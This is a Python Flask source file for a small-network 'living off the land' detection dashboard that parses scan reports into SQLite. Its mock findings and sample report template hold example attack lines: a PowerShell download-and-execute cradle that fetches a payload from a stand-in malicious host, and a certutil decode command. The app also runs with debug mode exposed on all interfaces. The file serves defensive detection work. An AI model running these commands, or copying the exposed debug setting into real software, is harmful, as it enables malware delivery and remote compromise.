#!/usr/bin/env python3
"""
LOTL Dashboard for Small Networks
Cyborama, LLC - "Threat Intelligence with Teeth™"
"""

from flask import Flask, render_template, request, jsonify, send_file
import sqlite3
import json
import os
import subprocess
import tempfile
from datetime import datetime
import re
from bs4 import BeautifulSoup

app = Flask(__name__)
DATABASE = 'lotl_findings.db'

def init_db():
    """Initialize SQLite database"""
    conn = sqlite3.connect(DATABASE)
    c = conn.cursor()
    c.execute('''CREATE TABLE IF NOT EXISTS findings
                 (id INTEGER PRIMARY KEY AUTOINCREMENT,
                  hostname TEXT,
                  ip_address TEXT,
                  timestamp TEXT,
                  category TEXT,
                  title TEXT,
                  description TEXT,
                  risk TEXT,
                  evidence TEXT,
                  remediation TEXT,
                  status TEXT DEFAULT 'open',
                  created_at TEXT DEFAULT CURRENT_TIMESTAMP)''')
    
    c.execute('''CREATE TABLE IF NOT EXISTS scans
                 (id INTEGER PRIMARY KEY AUTOINCREMENT,
                  hostname TEXT,
                  ip_address TEXT,
                  scan_time TEXT,
                  total_findings INTEGER,
                  high_risk INTEGER,
                  medium_risk INTEGER,
                  low_risk INTEGER,
                  scan_duration REAL,
                  created_at TEXT DEFAULT CURRENT_TIMESTAMP)''')
    
    c.execute('''CREATE TABLE IF NOT EXISTS hosts
                 (id INTEGER PRIMARY KEY AUTOINCREMENT,
                  hostname TEXT UNIQUE,
                  ip_address TEXT,
                  last_seen TEXT,
                  os_version TEXT,
                  risk_score INTEGER DEFAULT 0,
                  status TEXT DEFAULT 'unknown',
                  notes TEXT,
                  created_at TEXT DEFAULT CURRENT_TIMESTAMP)''')
    conn.commit()
    conn.close()

def parse_lotl_html(html_content, hostname="unknown", ip_address="unknown"):
    """Parse LOT-Squatch HTML report and extract findings"""
    findings = []
    
    try:
        soup = BeautifulSoup(html_content, 'html.parser')
        
        # Find timestamp
        timestamp_elem = soup.find('div', class_='timestamp')
        timestamp = timestamp_elem.text.strip() if timestamp_elem else datetime.now().isoformat()
        
        # Extract hostname if available
        host_info = soup.find('p', class_='timestamp')
        if host_info:
            match = re.search(r'System: (.+)', host_info.text)
            if match:
                hostname = match.group(1)
        
        # Parse summary counts
        summary_counts = {}
        summary_items = soup.find_all('div', class_='summary-item')
        for item in summary_items:
            value_elem = item.find('div', class_='summary-value')
            label_elem = item.find('div', class_='summary-label')
            if value_elem and label_elem:
                label = label_elem.text.strip().lower().replace(' ', '_')
                value = value_elem.text.strip()
                if value.isdigit():
                    summary_counts[label] = int(value)
        
        # Parse findings
        findings_divs = soup.find_all('div', class_='finding')
        for finding_div in findings_divs:
            # Extract risk level from class
            risk = "medium"
            if 'high' in finding_div.get('class', []):
                risk = "high"
            elif 'low' in finding_div.get('class', []):
                risk = "low"
            elif 'info' in finding_div.get('class', []):
                risk = "info"
            
            # Try to extract title (usually in h3 or bold text)
            title_elem = finding_div.find(['h3', 'h4', 'strong', 'b'])
            title = title_elem.text.strip() if title_elem else "Untitled Finding"
            
            # Try to extract category from preceding h2
            category = "Unknown"
            prev_h2 = finding_div.find_previous('h2')
            if prev_h2:
                category = prev_h2.text.strip()
            
            # Extract description (all text in finding div)
            description = finding_div.get_text(strip=True)
            
            # Extract evidence (look for pre tags or specific patterns)
            evidence_elem = finding_div.find('pre')
            evidence = evidence_elem.text.strip() if evidence_elem else ""
            
            # Extract remediation (look for specific markers)
            remediation = ""
            for elem in finding_div.find_all(['p', 'div']):
                text = elem.text.strip()
                if 'remediation' in text.lower() or 'recommendation' in text.lower():
                    remediation = text
                    break
            
            finding = {
                'hostname': hostname,
                'ip_address': ip_address,
                'timestamp': timestamp,
                'category': category,
                'title': title,
                'description': description[:500],  # Limit length
                'risk': risk,
                'evidence': evidence[:1000],  # Limit length
                'remediation': remediation[:500],
                'status': 'open'
            }
            findings.append(finding)
    
    except Exception as e:
        print(f"Error parsing HTML: {e}")
        # Create at least a basic finding with the error
        findings.append({
            'hostname': hostname,
            'ip_address': ip_address,
            'timestamp': datetime.now().isoformat(),
            'category': 'Parse Error',
            'title': 'Failed to parse LOT-Squatch report',
            'description': f'Error: {str(e)}',
            'risk': 'info',
            'evidence': '',
            'remediation': 'Check the HTML format',
            'status': 'open'
        })
    
    return findings, summary_counts

def save_findings(findings):
    """Save findings to database"""
    conn = sqlite3.connect(DATABASE)
    c = conn.cursor()
    
    for finding in findings:
        c.execute('''INSERT INTO findings 
                     (hostname, ip_address, timestamp, category, title, 
                      description, risk, evidence, remediation, status)
                     VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)''',
                  (finding['hostname'], finding['ip_address'], finding['timestamp'],
                   finding['category'], finding['title'], finding['description'],
                   finding['risk'], finding['evidence'], finding['remediation'],
                   finding['status']))
    
    conn.commit()
    conn.close()

def get_recent_findings(limit=100):
    """Get recent findings from database"""
    conn = sqlite3.connect(DATABASE)
    conn.row_factory = sqlite3.Row
    c = conn.cursor()
    
    c.execute('''SELECT * FROM findings 
                 ORDER BY timestamp DESC 
                 LIMIT ?''', (limit,))
    findings = [dict(row) for row in c.fetchall()]
    
    conn.close()
    return findings

def get_summary_stats():
    """Get summary statistics"""
    conn = sqlite3.connect(DATABASE)
    c = conn.cursor()
    
    stats = {}
    
    # Total findings by risk
    c.execute('''SELECT risk, COUNT(*) as count FROM findings 
                 WHERE status = 'open'
                 GROUP BY risk''')
    for row in c.fetchall():
        stats[f'{row[0]}_findings'] = row[1]
    
    # Total unique hosts
    c.execute('SELECT COUNT(DISTINCT hostname) FROM findings')
    stats['total_hosts'] = c.fetchone()[0]
    
    # Findings by category
    c.execute('''SELECT category, COUNT(*) as count FROM findings 
                 WHERE status = 'open'
                 GROUP BY category
                 ORDER BY count DESC''')
    stats['by_category'] = [{'category': row[0], 'count': row[1]} for row in c.fetchall()]
    
    conn.close()
    return stats

@app.route('/')
def index():
    """Main dashboard page"""
    findings = get_recent_findings(50)
    stats = get_summary_stats()
    
    return render_template('index.html', 
                         findings=findings,
                         stats=stats,
                         total_findings=len(findings))

@app.route('/upload', methods=['POST'])
def upload_report():
    """Upload LOT-Squatch HTML report"""
    if 'file' not in request.files:
        return jsonify({'error': 'No file uploaded'}), 400
    
    file = request.files['file']
    hostname = request.form.get('hostname', 'unknown')
    ip_address = request.form.get('ip_address', 'unknown')
    
    if file.filename == '':
        return jsonify({'error': 'No file selected'}), 400
    
    # Read HTML content
    html_content = file.read().decode('utf-8', errors='ignore')
    
    # Parse findings
    findings, summary_counts = parse_lotl_html(html_content, hostname, ip_address)
    
    # Save to database
    save_findings(findings)
    
    return jsonify({
        'success': True,
        'findings_count': len(findings),
        'summary': summary_counts,
        'hostname': hostname
    })

@app.route('/run-scan', methods=['POST'])
def run_scan():
    """Run LOT-Squatch scan on remote host"""
    hostname = request.form.get('hostname')
    username = request.form.get('username')
    password = request.form.get('password')
    
    if not hostname:
        return jsonify({'error': 'Hostname required'}), 400
    
    # This is a placeholder - would need WinRM or SSH implementation
    # For now, return mock data
    mock_findings = [
        {
            'hostname': hostname,
            'ip_address': hostname,
            'timestamp': datetime.now().isoformat(),
            'category': 'PowerShell',
            'title': 'Suspicious PowerShell Execution',
            'description': 'Unusual PowerShell command execution detected',
            'risk': 'high',
            'evidence': 'Command: Invoke-Expression (New-Object Net.WebClient).DownloadString',
            'remediation': 'Review PowerShell execution policy and logging',
            'status': 'open'
        },
        {
            'hostname': hostname,
            'ip_address': hostname,
            'timestamp': datetime.now().isoformat(),
            'category': 'LOLBAS',
            'title': 'Living Off The Land Binary Detected',
            'description': 'Legitimate Windows binary used for suspicious activity',
            'risk': 'medium',
            'evidence': 'Binary: certutil.exe used with unusual arguments',
            'remediation': 'Monitor certutil.exe usage and consider restricting',
            'status': 'open'
        }
    ]
    
    save_findings(mock_findings)
    
    return jsonify({
        'success': True,
        'findings_count': len(mock_findings),
        'hostname': hostname
    })

@app.route('/api/findings')
def api_findings():
    """API endpoint for findings"""
    limit = request.args.get('limit', 100, type=int)
    offset = request.args.get('offset', 0, type=int)
    risk = request.args.get('risk')
    category = request.args.get('category')
    hostname = request.args.get('hostname')
    
    conn = sqlite3.connect(DATABASE)
    conn.row_factory = sqlite3.Row
    c = conn.cursor()
    
    query = 'SELECT * FROM findings WHERE 1=1'
    params = []
    
    if risk:
        query += ' AND risk = ?'
        params.append(risk)
    
    if category:
        query += ' AND category LIKE ?'
        params.append(f'%{category}%')
    
    if hostname:
        query += ' AND hostname = ?'
        params.append(hostname)
    
    query += ' ORDER BY timestamp DESC LIMIT ? OFFSET ?'
    params.extend([limit, offset])
    
    c.execute(query, params)
    findings = [dict(row) for row in c.fetchall()]
    
    conn.close()
    return jsonify({'findings': findings})

@app.route('/api/stats')
def api_stats():
    """API endpoint for statistics"""
    stats = get_summary_stats()
    return jsonify(stats)

@app.route('/api/hosts')
def api_hosts():
    """API endpoint for hosts"""
    conn = sqlite3.connect(DATABASE)
    conn.row_factory = sqlite3.Row
    c = conn.cursor()
    
    c.execute('''SELECT DISTINCT hostname, ip_address, 
                 MAX(timestamp) as last_scan,
                 COUNT(*) as finding_count,
                 SUM(CASE WHEN risk = "high" THEN 1 ELSE 0 END) as high_count
                 FROM findings 
                 GROUP BY hostname, ip_address
                 ORDER BY last_scan DESC''')
    
    hosts = [dict(row) for row in c.fetchall()]
    conn.close()
    return jsonify({'hosts': hosts})

@app.route('/download-template')
def download_template():
    """Download a sample LOT-Squatch report template"""
    template = '''<!DOCTYPE html>
<html>
<head>
    <title>LOT-Squatch Sample Report</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; }
        .finding { border: 1px solid #ddd; padding: 15px; margin: 10px 0; }
        .high { border-left: 4px solid red; }
        .medium { border-left: 4px solid orange; }
        .low { border-left: 4px solid green; }
        h2 { color: #333; }
    </style>
</head>
<body>
    <h1>LOT-Squatch Detection Report</h1>
    <p>Generated: 2026-02-27 12:00:00</p>
    <p>System: WORKSTATION01\\Administrator</p>
    
    <h2>PowerShell Findings</h2>
    <div class="finding high">
        <h3>Suspicious PowerShell Execution</h3>
        <p>Unusual PowerShell command execution detected</p>
        <pre>Evidence: Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')</pre>
        <p><strong>Remediation:</strong> Review PowerShell execution policy and enable logging</p>
    </div>
    
    <h2>LOLBAS Findings</h2>
    <div class="finding medium">
        <h3>Living Off The Land Binary Detected</h3>
        <p>Legitimate Windows binary used for suspicious activity</p>
        <pre>Evidence: certutil.exe -decode encoded.txt decoded.exe</pre>
        <p><strong>Remediation:</strong> Monitor certutil.exe usage and consider restricting</p>
    </div>
</body>
</html>'''
    
    with tempfile.NamedTemporaryFile(mode='w', suffix='.html', delete=False) as f:
        f.write(template)
        temp_path = f.name
    
    return send_file(temp_path, as_attachment=True, download_name='lotl-template.html')

if __name__ == '__main__':
    init_db()
    app.run(debug=True, host='0.0.0.0', port=5000)